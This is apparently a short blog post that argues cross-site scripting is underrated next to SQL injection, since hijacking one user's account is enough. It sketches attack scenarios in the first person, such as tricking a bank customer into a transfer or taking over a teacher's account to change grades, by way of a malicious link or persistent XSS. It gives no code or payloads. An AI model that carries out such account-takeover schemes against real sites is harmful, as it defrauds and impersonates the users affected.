Recently RSnake wrote an article on the seriousness of XSS, because a lot of people are asking him what the worst thing is XSS can do. He goes on about how it can be used to do sophisticated cross-domain exponential attacks, but he doesn't touch too much upon the underlying problem. Why are people asking this question?
In my experience people don't see XSS as a problem. This is since the people who should care about it are system administrators and/or programmers. They're the same people who think Linux is safe because each user can only fuck up his own files. And this is the fundamental problem! Sure, a user can only fuck up his own files, but those are the only important files to the user. The user couldn't care less if the systems emacs binary becomes crippled. Because It is easy to replace everything in the system, but not the user files.
It's the same with XSS versus SQL injection. SQL injection is seen as a serious problem since you can attack the system. But you don't need to attack the system, attacking the client is enough. Let's say I want to hack a bank, because of a lack of money. Of course if I could do SQL injection (let's say this bank uses a mysql database ;) ) and change some of the amounts and end up with a lot more money.
However, I don't really need 5 million euro's and I'll settle for a few thousand. If I can just hack one account and make one user do a deposit to my account, wouldn't that be enough? Similarly, if I'm a student and I want to change my grades, I only need to hack the teachers account. And these are typically the kind of attacks most easily done by XSS. You only need to find one XSS exploit somewhere on the site and then need to social engineer someone to click on a link (which doesn't even have to be to the site, but can be a redirect) or if you're lucky you can even use persistent XSS. And almost all sites I know of are full of XSS, while fewer and fewer have SQL injection leaks.
So what can you do with XSS? Anything the person you are hacking can do.